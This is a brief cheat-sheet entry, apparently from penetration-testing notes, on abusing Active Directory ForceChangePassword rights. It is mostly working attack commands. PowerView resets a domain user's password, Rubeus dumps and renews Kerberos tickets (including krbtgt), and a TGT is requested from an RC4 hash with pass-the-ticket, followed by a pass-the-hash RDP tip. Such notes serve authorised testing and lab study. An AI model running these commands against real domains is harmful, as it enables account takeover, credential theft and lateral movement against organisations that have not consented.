ForceChangePassword

The attacker can change the password of the user. This can be achieved with a PowerView module.

$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity final\nina -AccountPassword $UserPassword

If having issues, try to renew ticket or request a new ticket of authorized user.

klist purge
.\Rubeus.exe triage
.\Rubeus.exe dump /luid:0x8c78b /service:krbtgt /nowrap
.\Rubeus.exe renew /ticket:doIFBj...BsJZmluYWwuY29t /ptt

Rubeus.exe asktgt /user:adminWebSvc /rc4:b0df1cb0819ca0b7d476d4c868175b94 /ptt

Note that sometimes net user wont work, attempt through PTH RDP or other form

Last updated 1 year ago